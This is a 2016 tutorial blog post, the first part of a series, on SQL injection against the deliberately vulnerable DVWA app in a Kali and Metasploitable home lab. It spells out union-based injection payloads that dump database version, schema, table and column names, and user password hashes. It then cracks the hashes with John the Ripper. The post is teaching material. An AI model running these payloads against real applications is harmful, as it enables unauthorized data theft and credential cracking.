September 6, 2016
SQL Injection Lab Part 1 – Lab Setup
September 6, 2016
Hello Cybrarians ! ! !
Welcome to: SQL injection lab PT.1 – Intro/Lab setup
In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide to learn SQL Injection.
*Skill/Experience : Before proceeding to this series, you must know basics on setting up VM environments.
- Let’s start from LAB setup (This part explains how we will perform this lab, and what will we deal with).> Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode. (You must knw this)> Check IP address of both devices.
- Open Kali Linux (or BT 5r3)
- Open your browser and type https://IP address of Metasploitable/dvwa/login.php
- Login with user name “admin” and password “password”
- Click on DVWA Security and set it to low then submit
- Click on manual SQL injection
- On User ID box type 1 and Submit (Php select statement: $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id'”;)
- %’ or ‘0’=’0 (mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=’0′;)
- Get DB version: %’ or 0=0 union select null, version()#
- Get DB user: %’ or 0=0 union select null, user()#
- Get DB name: %’ or 0=0 union select null, database()#
- Get Schima information: %’ and 1=0 union select null, table_name from information_schema.tables#
- Get user table in Schema information: %’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’#
- Get all the columns fields in the information_schema user table: %’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’#
- Let’s get password authentication hash: %’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users#
- Now copy all the hash file in a notepad as below format E.g. user:password
- Save it to /pentest/passwords/john by name dvwa_password.txt
- Open a console and go to /pentest/passwords/john
- cd /pentest/passwords/john
- now lunch john the ripper ./john –format=raw-MD5 dvwa_password.txt and hit enter.
….Ok Cybrarians, we’ll continue this in the next part.
By : Bijay Acharya